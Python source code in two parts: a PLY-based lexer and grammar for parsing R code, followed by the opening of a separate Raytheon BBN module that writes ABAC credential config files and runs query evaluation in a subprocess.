class _RStream(object):
"""A character stream with facilities for the R lexer."""
def __init__(self, stream_input):
if not (isinstance(stream_input, basestring) or
isinstance(stream_input, file)):
raise RuntimeError('Either a file or a string should be provided')
if isinstance(stream_input, file):
self.stream = stream_input
else:
self.stream = StringIO.StringIO(stream_input)
self.line = 1
self.col = 0
self.last_col = 0
self.last_getc = None
def GetChar(self):
"""Read the next character, updating the current line and column."""
c = self.stream.read(1) or 'R_EOF'
if c != 'R_EOF':
if c == '\n':
self.line += 1
self.last_col, self.col = self.col, 0
else:
self.col += 1
self.last_getc = c # Record for use in UnGetChar below.
return c
def UnGetChar(self):
"""Push the last fetched character back onto the input stream."""
# Currently, no provision is made for calling UnGetChar twice, with no
# intervening GetChar.
if self.last_getc is None:
raise AssertionError('Too many UnGetChar\'s')
# Don't back up if we're past the end of the file, but do back up if we just
# arrived there.
if self.last_getc != 'R_EOF':
self.stream.seek(-1, os.SEEK_CUR)
if self.last_getc == '\n':
self.col, self.last_col = self.last_col, 0
self.line -= 1
self.last_getc = None
else:
self.col -= 1
def IsNextChar(self, c):
"""Fetch a character from the input only if it has the value specified."""
if self.GetChar() == c:
return True
else:
self.UnGetChar()
return False
def Peek(self):
"""Return the value of the next input character, but do not fetch it."""
c = self.GetChar()
self.UnGetChar()
return c
def Checkpoint(self):
"""Record state including the current position of the input stream."""
self.checkpoint = (self.stream.tell(),
(self.line, self.col, self.last_col, self.last_getc))
def Reset(self):
"""Return to the state at the last checkpoint."""
self.stream.seek(self.checkpoint[0], os.SEEK_SET)
self.line, self.col, self.last_col, self.last_getc = self.checkpoint[1]
def Close(self):
self.stream.close()
class _RComments(object):
"""An object representing comments in R source code (abstract class).
"""
def __init__(self):
self.lines = []
def __str__(self):
return '#' + str(self.lines)
def __nonzero__(self):
"""If this object contains at least one line of text."""
return bool(self.lines)
def AppendLine(self, line):
"""Append a line of text to the comment."""
self.lines.append(line)
def Trim(self):
self.lines = [ln.lstrip('\n') for ln in self.lines]
class _RLineComments(_RComments):
"""A class representing in-line comments.
"""
def __str__(self):
return 'L' + super(_RLineComments, self).__str__()
class _RBlockComments(_RComments):
"""A comment that occupies entire lines and may include blank lines.
"""
def __str__(self):
return 'B' + super(_RBlockComments, self).__str__()
class RToken(object):
"""An analog of the PLY token, with positional information and comments."""
def __init__(self, token_type, value, line, col):
self.line = line
self.col = col
self.type = token_type
self.value = value
self.pre_comments = None
self.post_comments = None
def __str__(self):
return '(%s, %s, %s, %s)@(%d,%d)' % (self.type, self.value,
str(self.pre_comments),
str(self.post_comments),
self.line, self.col)
class _RTokenizer(object):
"""The substrate of the R lexer, responsible for basic tokenization."""
def __init__(self, stream_input):
self.stream = _RStream(stream_input)
def Token(self, token_type, value=None):
"""Construct and return a new RToken.
Args:
token_type: a string specifying the NextToken's terminal "type", as used
in PLY's grammar productions.
value: a string giving the actual text associated with the NextToken. If
the value supplied is "None", the NextToken's type is its value, too.
Returns:
An RToken with the type and value supplied, and positional information
taken from the input stream.
"""
return RToken(token_type, value or token_type, self.stream.line,
self.stream.col)
def SkipSpace(self):
"""Skip whitespace in the input."""
while True:
c = self.stream.GetChar()
if not (c == ' ' or c == '\t' or c == '\f'):
return c
def ProbeForCommentLine(self, break_on_blank_line=False):
"""Look for a line comprising comments.
Args:
break_on_blank_line: whether to cease the search after a blank line
Returns:
A string comprising the line, or None if none are found.
"""
ws_chars = (' ', '\t', '\f')
le_chars = ('\n', 'R_EOF')
s = []
def NextChar(c):
if c:
s.append(c)
return self.stream.GetChar()
def Line():
return ''.join(s).lstrip('\n')
state = 1
c = ''
while True:
c = NextChar(c)
if state == 1:
if c == '\n' or c in ws_chars:
if break_on_blank_line and c == '\n':
break
if self.stream.Peek() == 'R_EOF': break
state = 2
continue
elif c == '#':
state = 3
continue
else:
break
if state == 2:
if c in ws_chars:
continue
elif c in le_chars:
return Line()
elif c == '#':
state = 3
continue
else:
break
if state == 3:
if c in le_chars:
return Line()
else:
continue
return None
def ProbeForComments(self, post):
"""Look for comments before or after a token.
Args:
post: whether the comments occur after a token.
Returns:
An RLineComments (post = True) or RBlockComments (post = False)
containing the comments, or None if none are found.
"""
comments = (_RLineComments if post else _RBlockComments)()
start_col = self.stream.col
hash_col = 0
do_reset = True
while True:
self.stream.Checkpoint()
line = self.ProbeForCommentLine(
break_on_blank_line=post and not hash_col)
if line is None:
break
if post:
ls_line = line.lstrip()
if not ls_line:
# Absorb trailing spaces, but don't make up a line comment
do_reset = hash_col > 0
self.stream.UnGetChar() # Leave last CR in the stream
break
if not hash_col:
hash_col = start_col + len(line) - len(ls_line) + 1
elif len(line) - len(ls_line) + 1 < hash_col:
break
self.stream.UnGetChar()
comments.AppendLine(line)
if do_reset:
self.stream.Reset()
if comments:
return comments
else:
return None
def NumericValue(self, c):
"""Read a NextToken comprising a numeric value.
Args:
c: the first character of the numeric value.
Returns:
An RToken of type 'NUM_CONST' containing the numeric value as a string.
"""
seen_dot = c == '.'
seen_exp = False
s = [c]
while True:
c = self.stream.GetChar()
if not (c.isdigit() or c == '.' or c == 'e' or c == 'E'):
break
if c == 'e' or c == 'E':
if seen_exp: break
seen_exp = True
seen_dot = True
s.append(c)
c = self.stream.GetChar()
if not (c.isdigit() or c == '+' or c == '-'): break
if c == '.':
if seen_dot: break
seen_dot = True
s.append(c)
if c in ('i', 'L'):
s.append(c)
else:
self.stream.UnGetChar()
return self.Token('NUM_CONST', ''.join(s))
def StringValue(self, quote):
"""Read a NextToken comprising a literal string value.
Args:
quote: the quote character signifying the beginning of the string.
Returns:
An RToken of type 'STR_CONST' containing the string.
"""
s = [quote]
while True:
c = self.stream.GetChar()
if c == 'R_EOF':
c = quote
s.append(c)
if c == quote:
return self.Token('STR_CONST', ''.join(s))
if c == '\\':
s.append(self.stream.GetChar())
def QuotedSymbolValue(self, c):
"""Read a NextToken comprising a back-quoted symbol.
Args:
c: the back quote character signifying the beginning of the string.
Returns:
An RToken of type 'SYMBOL' containing the symbol.
"""
val = self.StringValue(c)
val.type = 'SYMBOL'
return val
def SpecialValue(self, c):
"""Read a NextToken comprising a special operator, delimited by '%'.
Args:
c: the '%' character signifying the beginning of the string.
Returns:
An RToken of type 'SPECIAL' containing the operator.
"""
s = [c]
while True:
c = self.stream.GetChar()
if c == 'R_EOF': c = '%'
if c == '\n':
_RaiseRSyntaxError('Syntax error:\n End of line in special',
(self.stream.line, self.stream.col))
s.append(c)
if c == '%': return self.Token('SPECIAL', ''.join(s))
# Certain symbols are recognized as keywords if they're in the following
# dict.
keywords = {'function': 'FUNCTION',
'while': 'WHILE',
'repeat': 'REPEAT',
'for': 'FOR',
'if': 'IF',
'in': 'IN',
'else': 'ELSE',
'next': 'NEXT',
'break': 'BREAK'}
def SymbolValue(self, c):
"""Read a non-quoted symbol (usually an identifier) or keyword.
Args:
c: the character beginning the symbol.
Returns:
An RToken containing the symbol, with a particular keyword type if the
symbol is one of R's reserved keywords, or of type 'SYMBOL' otherwise.
"""
s = [c]
while True:
c = self.stream.GetChar()
# Special case simple package qualifications "pkg::var" and "pkg:::var";
# rendering these as a single token, rather than a binary expression
# avoids considerable unpleasantness in formatting.
if c == ':':
self.stream.Checkpoint()
if self.stream.GetChar() == ':': # Got '::'
s += [':'] * 2
c = self.stream.GetChar()
if c == ':': # Got ':::'
s += [':']
c = self.stream.GetChar()
else:
self.stream.Reset()
if c == 'R_EOF' or not (c.isalnum() or c == '.' or c == '_'):
self.stream.UnGetChar()
txt = ''.join(s)
return self.Token(_RTokenizer.keywords.get(txt, 'SYMBOL'), txt)
s.append(c)
def NextToken(self):
"""Read the next token from the input stream."""
c = self.SkipSpace()
# The structure of this method follows that of the C code fairly closely;
# doubtless it could be factored more elegantly.
if c == 'R_EOF':
return self.Token('END_OF_INPUT')
if c.isdigit() or (c == '.' and self.stream.Peek().isdigit()):
return self.NumericValue(c)
if c == '"' or c == "'":
return self.StringValue(c)
if c == '%':
return self.SpecialValue(c)
if c == '`':
return self.QuotedSymbolValue(c)
if c.isalpha() or c == '.':
return self.SymbolValue(c)
if c == '{':
return self.Token('LBRACE', '{')
if c == '}':
return self.Token('RBRACE', '}')
if c == '<':
if self.stream.IsNextChar('='):
return self.Token('LE', '<=')
if self.stream.IsNextChar('-'):
return self.Token('LEFT_ASSIGN', '<-')
if self.stream.IsNextChar('<'):
if self.stream.IsNextChar('-'):
return self.Token('LEFT_ASSIGN', '<<-')
else:
return None
return self.Token('<')
if c == '-':
if self.stream.IsNextChar('>'):
if self.stream.IsNextChar('>'):
return self.Token('RIGHT_ASSIGN', '->>')
else:
return self.Token('RIGHT_ASSIGN', '->')
return self.Token('-')
if c == '>':
if self.stream.IsNextChar('='):
return self.Token('GE', '>=')
else:
return self.Token('>')
if c == '!':
if self.stream.IsNextChar('='):
return self.Token('NE', '!=')
else:
self.Token('!')
if c == '=':
if self.stream.IsNextChar('='):
return self.Token('EQ', '==')
else:
return self.Token('EQ_ASSIGN', '=')
if c == ':':
if self.stream.IsNextChar(':'):
if self.stream.IsNextChar(':'):
return self.Token('NS_GET_INT', ':::')
else:
return self.Token('NS_GET', '::')
if self.stream.IsNextChar('='):
return self.Token('LEFT_ASSIGN', ':=')
return self.Token(':')
if c == '&':
if self.stream.IsNextChar('&'):
return self.Token('AND2', '&&')
else:
return self.Token('AND', '&')
if c == '|':
if self.stream.IsNextChar('|'):
return self.Token('OR2', '||')
else:
return self.Token('OR', '|')
if c == '[':
if self.stream.IsNextChar('['):
return self.Token('LBB', '[[')
else:
return self.Token('[')
if c == '*':
if self.stream.IsNextChar('*'):
return self.Token('^')
else:
return self.Token(c)
# Default
return self.Token(c)
class _RLexer(object):
"""An object that carries out context-sensitive lexing of the R language.
For explanation of the grisly details, see:
https://github.com/wch/r-source/blob/trunk/src/main/gram.y#L2975
"""
def __init__(self):
# Vacuous; the design of PLY makes it expedient to relegate the setup to
# the input method below.
pass
# Non-Google standard naming is mandated by PLY.
# pylint: disable=invalid-name
def input(self, stream_input):
"""Initialize the lexer from a string or a stream."""
self.tokenizer = _RTokenizer(stream_input)
self.context = ['LBRACE']
self.__IgnoreNewLines = False
self.SavedToken = None
self.begin_token = self.tokenizer.Token('BEGIN')
self.saved_pre_comments = None
@property
def IgnoreNewLines(self):
# Strictly speaking, this method and its partner could be easily abolished
# in favor of direct field access. However, so tortuous is R's lexing
# process that it's very useful, at least pro tem, to have methods in this
# connection for (temporary) journaling and debugging purposes.
return self.__IgnoreNewLines
@IgnoreNewLines.setter
def IgnoreNewLines(self, value):
self.__IgnoreNewLines = value
def IgnoreNewLinesFromParser(self, value):
"""Switch the behavior of the lexer from the parser."""
self.IgnoreNewLines = value
def CurContext(self):
"""A character signifying the construct in which lexing is taking place."""
return self.context[-1]
def IfPush(self):
"""Record entry of the lexer into a conditional construct."""
if self.CurContext() in ('LBRACE', '[', '(', 'i'):
self.context.append('i')
self.saved_new_lines = 0
def IfPop(self):
"""Record exit from a conditional construct."""
if self.CurContext() == 'i':
self.context.pop()
# Non-Google standard naming is mandated by PLY.
# pylint: disable=invalid-name
def token(self):
tok = self.__token()
return tok
def __token(self):
"""Return the next token retrieved by the lexer."""
# Deals with saved state from earlier scans---actual scanning is delegated
# to ScanForToken().
if self.begin_token:
token, self.begin_token = self.begin_token, None
else:
token = self.ScanForToken()
if token.type == 'END_OF_INPUT':
if token.pre_comments:
anchor = self.tokenizer.Token('SYMBOL', '__END_COMMENT_ANCHOR__')
anchor.pre_comments = token.pre_comments
return anchor
return None
token.post_comments = self.tokenizer.ProbeForComments(post=True)
return token
def ScanForToken(self):
"""Actually scan for the next token in the input stream."""
while True:
if self.SavedToken:
tok, self.SavedToken = self.SavedToken, None
else:
if self.saved_pre_comments is not None:
pre_comments = self.saved_pre_comments
self.saved_pre_comments = None
else:
pre_comments = self.tokenizer.ProbeForComments(post=False)
tok = self.tokenizer.NextToken()
tok.pre_comments = pre_comments
if not(tok.value == '\n' and
(self.IgnoreNewLines or self.CurContext() in ('[', '('))):
break
if tok.value == '\n' and tok.pre_comments:
self.saved_pre_comments = tok.pre_comments
if tok.value == '\n':
self.saved_pre_comments = tok.pre_comments
if self.CurContext() == 'i': # In 'if' context
while tok.value == '\n':
tok = self.tokenizer.NextToken()
tok.pre_comments = self.saved_pre_comments
self.saved_pre_comments = None
if tok.type == 'RBRACE' or tok.type == ')' or tok.type == ']':
while self.CurContext() == 'i':
self.IfPop()
self.context.pop()
return tok
if tok.value == ',':
self.IfPop()
return tok
if tok.type == 'ELSE':
self.IgnoreNewLines = True
self.IfPop()
return tok
else:
self.IfPop()
self.SavedToken = tok
return self.tokenizer.Token('CR')
return self.tokenizer.Token('CR')
if tok.type in ('+', '-', '*', '/', '^', 'LT', 'LE', 'GE', 'GT', 'EQ',
'NE', 'OR', 'AND', 'OR2', 'AND2', 'SPECIAL', 'FUNCTION',
'WHILE', 'REPEAT', 'FOR', 'IN', '?', '!', '-', ':',
'$', '@', 'LEFT_ASSIGN', 'RIGHT_ASSIGN', 'EQ_ASSIGN'):
self.IgnoreNewLines = True
elif tok.type == 'IF':
self.IfPush()
self.IgnoreNewLines = True
elif tok.type == 'ELSE':
self.IfPop()
self.IgnoreNewLines = True
elif tok.type in (';', ','):
self.IfPop()
elif tok.type in ('SYMBOL', 'STR_CONST', 'NUM_CONST', 'NULL_CONST', 'NEXT',
'BREAK'):
self.IgnoreNewLines = False
elif tok.type == 'LBB':
self.context.append('[')
self.context.append('[')
elif tok.type == '[':
self.context.append(tok.type)
elif tok.type == 'LBRACE':
self.context.append(tok.type)
self.IgnoreNewLines = False
elif tok.type == '(':
self.context.append(tok.type)
elif tok.type == ']':
while self.CurContext() == 'i':
self.IfPop()
self.context.pop()
self.IgnoreNewLines = False
elif tok.type == 'RBRACE':
while self.CurContext() == 'i':
self.IfPop()
self.context.pop()
elif tok.type == ')':
while self.CurContext() == 'i':
self.IfPop()
self.context.pop()
self.IgnoreNewLines = False
return tok
class NodeTypeError(base.Error):
"""Signal attempt to check for unknown parse node type."""
_known_parse_node_types = []
def ParseNode(typename, field_names, subnode_indexes=None):
"""Return a constructor for a type of parse tree node.
Args:
typename: a string that names the node type.
field_names: a string consisting of a comma-separated list of fields in the
new node type.
subnode_indexes: a list of integers, specifying those fields of the node
that may themselves contain parse nodes. If this argument is None, or
no actual parameter is provided, it is assumed that all fields are
potential parse nodes.
Returns:
A function that accepts as arguments values for a new node's field, and
which returns a newly-created node of the given type.
"""
# Monkey patched methods to check a node's type.
def _NodeHasType(node, typename):
"""Check that a parse tree node has a given type.
Args:
node: a parse tree node; normally bound, as this function is used as a
method.
typename: a string that names a node type.
Returns:
Whether the type of the node is that given.
Raises:
NodeTypeError: the type name provided was unknown.
"""
if typename not in _known_parse_node_types:
raise NodeTypeError('"%s" is not a known node type' %
typename)
return typename == node.__class__.__name__
def _NodeHasTypeIn(node, typenames):
"""Check that a parse tree node has one of a given sequence of types.
Args:
node: a parse tree node; normally bound, as this function is used as a
method.
typenames: a sequence of strings that name node types.
Returns:
Whether the type of the node is in the given sequence of types.
Raises:
NodeTypeError: one or more of the type names provided was unknown.
"""
unknown_types = set(typenames).difference(_known_parse_node_types)
if unknown_types:
if len(unknown_types) == 1:
raise NodeTypeError('"%s" is not a known node type' %
unknown_types[0])
else:
raise NodeTypeError('%s are not known node types' %
', '.join('"%s"' % t for t in unknown_types))
return node.__class__.__name__ in typenames
_known_parse_node_types.append(typename)
cls = collections.namedtuple(typename, field_names)
if subnode_indexes is None:
# Naughty but necessary
# pylint: disable=protected-access
subnode_indexes = range(len(cls._fields))
cls.subnode_indexes = subnode_indexes
cls.HasType = _NodeHasType
cls.HasTypeIn = _NodeHasTypeIn
return cls
# Parse tree node types used for R.
# The following are really classes, not constants, so we beg dispensation from
# the linter.
# pylint: disable=invalid-name
Prog = ParseNode('Prog', 'begin, exprlist')
ExprOrAssign = ParseNode('ExprOrAssign', 'expr1, eq_assign, expr2')
Comment = ParseNode('Comment', 'comment', [])
FunCall = ParseNode('FunCall', 'expr, lparen, arglist, rparen')
Unary = ParseNode('Unary', 'op, expr')
Binary = ParseNode('Binary', 'lexpr, op, rexpr')
Assign = ParseNode('Assign', 'expr1, assign, expr2')
Paren = ParseNode('Paren', 'lparen, expr_or_assign, rparen')
Brace = ParseNode('Brace', 'lbrace, exprlist, rbrace')
If = ParseNode('If', 'if_, cond, expr_or_assign')
IfElse = ParseNode('IfElse',
'if_, cond, expr_or_assign1, else_, expr_or_assign2')
While = ParseNode('While', 'while_, cond, expr_or_assign')
Repeat = ParseNode('Repeat', 'repeat_, expr_or_assign')
For = ParseNode('For', 'for_, forcond, expr_or_assign')
Defun = ParseNode('Defun',
'function, lparen, formlist, rparen, expr_or_assign')
Subscript1 = ParseNode('Subscript1', 'expr, lbrac, sublist, rbrac')
Subscript2 = ParseNode('Subscript2', 'expr, lbbrac, sublist, rbrac1, rbrac2')
Cond = ParseNode('Cond', 'lparen, expr, rparen')
ForCond = ParseNode('ForCond', 'lparen, symbol, in_, expr, rparen')
ExprList = ParseNode('ExprList', 'elements')
ExprListElt = ParseNode('ExprListElt', 'expr_or_assign, semicolon')
ArgList = ParseNode('ArgList', 'elements')
ArgListElt = ParseNode('ArgListElt', 'arg, comma')
Arg = ParseNode('Arg', 'lhs, eq_assign, rhs')
Atom = ParseNode('Atom', 'type, text, comments', [])
# pylint: enable=invalid-name
class RSyntaxError(base.Error):
"""Raised when the R formatter encounters an error during parsing."""
def _RaiseRSyntaxError(msg, line_col=None):
if line_col:
msg += ' at line: %d, column: %d' % line_col
raise RSyntaxError(msg)
# PLY grammar for parsing R.
# For an overview of PLY's operation, see:
# http://www.dabeaz.com/ply/ply.html#ply_nn22.
tokens = ('NUM_CONST', 'STR_CONST', 'SYMBOL', 'SPECIAL', 'FUNCTION', 'WHILE',
'REPEAT', 'FOR', 'IF', 'IN', 'ELSE', 'NEXT', 'BREAK', 'LE',
'LEFT_ASSIGN', 'RIGHT_ASSIGN', 'GE', 'NE', 'EQ', 'EQ_ASSIGN',
'NS_GET_INT', 'NS_GET', 'AND2', 'AND', 'OR2', 'OR', 'LBB', 'BEGIN',
'?', 'LOW', '~', 'TILDE', '!', 'UNOT', '>', '<', '+', '-', '*',
'/', ':', 'UMINUS', 'UPLUS', '^', '$', '@', '(', '[', 'CR', 'LBRACE',
'RBRACE', 'COMMENT')
precedence = (('left', '?'),
('left', 'LOW', 'WHILE', 'FOR', 'REPEAT'),
('right', 'IF'),
('left', 'ELSE'),
('right', 'LEFT_ASSIGN'),
('right', 'EQ_ASSIGN'),
('left', 'RIGHT_ASSIGN'),
('left', '~', 'TILDE'),
('left', 'OR'),
('left', 'AND'),
('left', 'UNOT', '!'),
('left', '>', 'GE', '<', 'LE', 'EQ', 'NE'),
('left', '+', '-'),
('left', '*', '/'),
('left', 'SPECIAL'),
('left', ':'),
('left', 'UMINUS', 'UPLUS'),
('right', '^'),
('left', '$', '@'),
('left', 'NS_GET', 'NS_GET_INT'),
('nonassoc', '(', '[', 'LBB'))
def Precedence(op):
"""The numeric precedence of a binary operator."""
# Particularly convenient during layout of binary operators.
return float(sum(i * (op in grp[1:])
for i, grp in enumerate(precedence))) / len(precedence)
def _MakeAtom(p, i):
"""Make an Atom parse tree node from the PLY parser state.
Args:
p: a YaccProduction containing the state of the PLY parser.
i: the index of a terminal token in the production from which the node is
to be constructed.
Returns:
A parse tree node with the token's type, value and attached comments.
"""
tok = p.slice[i]
return Atom(tok.type, tok.value, (tok.pre_comments, tok.post_comments))
def ParseTreeFor(stream_input, **parse_args):
"""Run the R parser on the stream provided and return a parse tree."""
return _r_parser.parse(input=stream_input, lexer=_RLexer(), **parse_args)
# Begin PLY YACC productions.
# Disable lint checks that are incompatible with PLY's use of docstrings to
# express grammar productions.
# pylint: disable=g-docstring-quotes,g-short-docstring-punctuation
# pylint: disable=g-space-before-docstring-summary
# pylint: disable=g-no-space-after-docstring-summary
# pylint: disable=g-missing-docstring,g-doc-args,g-bad-name,g-doc-exception
def p_prog(p):
"""prog : BEGIN exprlist
"""
p[0] = Prog(_MakeAtom(p, 1), ExprList(p[2]))
def p_expr_or_assign(p):
"""expr_or_assign : expr
| expr EQ_ASSIGN expr_or_assign
"""
if len(p) == 2:
p[0] = ExprOrAssign(None, None, p[1])
else:
p[0] = ExprOrAssign(p[1], _MakeAtom(p, 2), p[3])
def p_exprlist(p):
"""exprlist :
| expr_or_assign
| CR exprlist
| ';' exprlist
| expr_or_assign CR exprlist
| expr_or_assign ';' exprlist
"""
p.lexer.IgnoreNewLinesFromParser(False)
if len(p) == 1:
p[0] = []
elif len(p) == 2:
p[0] = [ExprListElt(p[1], None)]
elif len(p) == 3:
if p[1] == ';':
p[0] = [ExprListElt(None, _MakeAtom(p, 1))] + p[2]
elif p[-1] == 'CR':
# Two consecutive CRs (i.e. an empty statement) result in a blank line
p[0] = [ExprListElt(None, None)] + p[2]
else:
p[0] = p[2]
else:
e1 = ExprListElt(p[1], _MakeAtom(p, 2) if p[2] == ';' else None)
p[0] = [e1] + p[3]
def p_expr_comment(p):
"""expr : COMMENT
"""
p[0] = Comment(p[1])
def p_expr_atom(p):
"""expr : NEXT
| BREAK
| NUM_CONST
| STR_CONST
| SYMBOL
"""
p[0] = _MakeAtom(p, 1)
def p_expr_function_call(p):
"""expr : expr '(' sublist ')'
"""
p[0] = FunCall(p[1], _MakeAtom(p, 2), ArgList(p[3]), _MakeAtom(p, 4))
def p_expr_unop(p):
"""expr : '-' expr %prec UMINUS
| '+' expr %prec UMINUS
| '!' expr %prec UNOT
| '~' expr %prec TILDE
| '?' expr
"""
p[0] = Unary(_MakeAtom(p, 1), p[2])
def p_expr_binop(p):
"""expr : expr ':' expr
| expr NS_GET expr
| expr NS_GET_INT expr
| expr '$' expr
| expr '@' expr
| expr '+' expr
| expr '-' expr
| expr '*' expr
| expr '/' expr
| expr '^' expr
| expr SPECIAL expr
| expr '%' expr
| expr '~' expr
| expr '?' expr
| expr '<' expr
| expr LE expr
| expr EQ expr
| expr NE expr
| expr GE expr
| expr '>' expr
| expr AND expr
| expr OR expr
| expr AND2 expr
| expr OR2 expr
"""
p[0] = Binary(p[1], _MakeAtom(p, 2), p[3])
def p_expr_assign(p):
"""expr : expr LEFT_ASSIGN expr
| expr RIGHT_ASSIGN expr
"""
p[0] = Assign(p[1], _MakeAtom(p, 2), p[3])
def p_expr_paren(p):
"""expr : '(' expr_or_assign ')'
"""
p[0] = Paren(_MakeAtom(p, 1), p[2], _MakeAtom(p, 3))
def p_sublist(p):
"""sublist :
| sub
| ',' sublist
| sub ',' sublist
"""
if len(p) == 1:
p[0] = [ArgListElt(None, None)]
elif len(p) == 2:
p[0] = [ArgListElt(p[1], None)]
elif len(p) == 3:
p[0] = [ArgListElt(None, _MakeAtom(p, 1))] + p[2]
else:
p[0] = [ArgListElt(p[1], _MakeAtom(p, 2))] + p[3]
def p_sub(p):
"""sub : expr
| SYMBOL EQ_ASSIGN
| SYMBOL EQ_ASSIGN expr
| STR_CONST EQ_ASSIGN
| STR_CONST EQ_ASSIGN expr
"""
if len(p) == 2:
p[0] = Arg(None, None, p[1])
return
p[0] = Arg(_MakeAtom(p, 1), _MakeAtom(p, 2), p[3] if len(p) == 4 else None)
def p_expr_braced_block(p):
"""expr : LBRACE exprlist RBRACE
"""
p[0] = Brace(_MakeAtom(p, 1), ExprList(p[2]), _MakeAtom(p, 3))
def p_eatlines(p):
"""eatlines :
"""
p.lexer.IgnoreNewLinesFromParser(True)
def p_expr_if_expr(p):
"""expr : IF '(' expr eatlines ')' expr_or_assign
"""
p[0] = If(_MakeAtom(p, 1), Cond(_MakeAtom(p, 2), p[3], _MakeAtom(p, 5)), p[6])
def p_expr_if_else(p):
"""expr : IF '(' expr eatlines ')' expr_or_assign ELSE expr_or_assign
"""
p[0] = IfElse(_MakeAtom(p, 1), Cond(_MakeAtom(p, 2), p[3], _MakeAtom(p, 5)),
p[6], _MakeAtom(p, 7), p[8])
def p_expr_while(p):
"""expr : WHILE '(' expr eatlines ')' expr_or_assign
"""
p[0] = While(_MakeAtom(p, 1), Cond(_MakeAtom(p, 2), p[3], _MakeAtom(p, 5)),
p[6])
def p_expr_repeat(p):
"""expr : REPEAT expr_or_assign
"""
p[0] = Repeat(_MakeAtom(p, 1), p[2])
def p_expr_for_expr(p):
"""expr : FOR '(' SYMBOL IN expr eatlines ')' expr_or_assign %prec FOR
"""
p[0] = For(_MakeAtom(p, 1), ForCond(_MakeAtom(p, 2), _MakeAtom(p, 3),
_MakeAtom(p, 4), p[5], _MakeAtom(p, 7)),
p[8])
def p_expr_function(p):
"""expr : FUNCTION '(' formlist eatlines ')' expr_or_assign %prec LOW
"""
p[0] = Defun(_MakeAtom(p, 1), _MakeAtom(p, 2), ArgList(p[3]), _MakeAtom(p, 5),
p[6])
def p_formlist(p):
"""formlist :
| form
| form ',' formlist
"""
if len(p) == 1:
p[0] = [ArgListElt(None, None)]
elif len(p) == 2:
p[0] = [ArgListElt(p[1], None)]
else:
p[0] = [ArgListElt(p[1], _MakeAtom(p, 2))] + p[3]
def p_form(p):
"""form : SYMBOL
| SYMBOL EQ_ASSIGN expr
"""
if len(p) == 2:
p[0] = Arg(_MakeAtom(p, 1), None, None)
return
p[0] = Arg(_MakeAtom(p, 1), _MakeAtom(p, 2), p[3])
def p_expr_subscript(p):
"""expr : expr '[' sublist ']'
| expr LBB sublist ']' ']'
"""
if len(p) == 5:
p[0] = Subscript1(p[1], _MakeAtom(p, 2), ArgList(p[3]), _MakeAtom(p, 4))
else:
p[0] = Subscript2(p[1], _MakeAtom(p, 2), ArgList(p[3]), _MakeAtom(p, 4),
_MakeAtom(p, 5))
def p_error(p):
if p is None:
_RaiseRSyntaxError('Unexpected end of file')
else:
_RaiseRSyntaxError('Unexpected "%s"' % p.value, (p.line, p.col))
# End PLY YACC productions.
# Generate an instance of the R parser, generated from the productions above.
# Options keep PLY from generating extraneous output files.
# TODO(pyelland): Consider making the latter command line options.
_r_parser = yacc.yacc(debug=False, optimize=True, tabmodule=rparsetab,
write_tables=False)
|
|
#----------------------------------------------------------------------
# Copyright (c) 2011-2015 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
#----------------------------------------------------------------------
# Class to manage a set of ABAC credentials, certificates and prove queries
from ConfigParser import ConfigParser
import optparse
import os
import subprocess
import sys
import tempfile
import ABAC
from chapi_log import *
# Generate an ABACManager config file
# [Principals]
# name=certfile
# ...
# [Keys]
# name=keyfile
#
# Return name of config file and any tempfiles created in this process
def create_abac_manager_config_file(id_cert_files, id_certs, id_key_files, \
raw_assertions):
tempfiles = []
# Format
# [Principals]
# The principals ("ME" and any in ID dictionary)
# [Keys]
# The keys ("ME")
# [AssertionFiles]
(fd, config_filename) = tempfile.mkstemp()
tempfiles.append(config_filename)
os.close(fd)
file = open(config_filename, 'w')
file.write('[Principals]\n')
for id_name, id_cert_file in id_cert_files.items():
file.write('%s=%s\n' % (id_name, id_cert_file))
for id_name, id_cert in id_certs.items():
(id_fd, id_filename) = tempfile.mkstemp()
tempfiles.append(id_filename)
os.close(id_fd)
id_file = open(id_filename, 'w')
id_file.write(id_cert)
id_file.close()
file.write('%s=%s\n' % (id_name, id_filename))
file.write('[Keys]\n')
for id_key_name, id_key_file in id_key_files.items():
file.write('%s=%s\n' % (id_key_name, id_key_file))
file.write('[AssertionFiles]\n')
for raw_assertion in raw_assertions:
(raw_fd, raw_filename) = tempfile.mkstemp()
tempfiles.append(raw_filename)
os.close(raw_fd)
raw_file = open(raw_filename, 'w')
raw_file.write(raw_assertion)
raw_file.close()
file.write('%s=None\n' % raw_filename)
file.close()
return config_filename, tempfiles
# Run a subprocess and grab and return contents of standard output
def grab_output_from_subprocess(args):
proc = subprocess.Popen(args, stdout=subprocess.PIPE)
result = ''
chunk = proc.stdout.read()
while chunk:
result = result + chunk
chunk = proc.stdout.read()
return result
# Run a subprocess and execute and grab results of ABAC query evaluation
def execute_abac_query(query, id_certs, raw_assertions = []):
config_filename, tempfiles = \
create_abac_manager_config_file({}, id_certs, {}, raw_assertions)
# Make the query call, pull result from stdout
chapi_home = os.getenv('CHAPIHOME')
chapi_tools = os.path.join(chapi_home, 'tools')
args = ['python', os.path.join(chapi_tools, 'ABACManager.py'),
'--config=%s' % config_filename,
'--query=%s' % query]
chapi_debug("ABAC", "Exec ABAC Query ARGS = %s" % " ".join(args))
result = grab_output_from_subprocess(args)
result_parts = result.split('\n')
ok = result_parts[0].find('Succeeded') >= 0
proof = "\n".join(result_parts[1:])
# Delete the tempfiles
for tfile in tempfiles:
os.unlink(tfile)
return ok, proof
# Generate an ABAC credential of a given assertion signed by "ME"
# with a set of id_certs (a dictionary of {name : cert}
# Run this as a separate process to avoid memory corruption
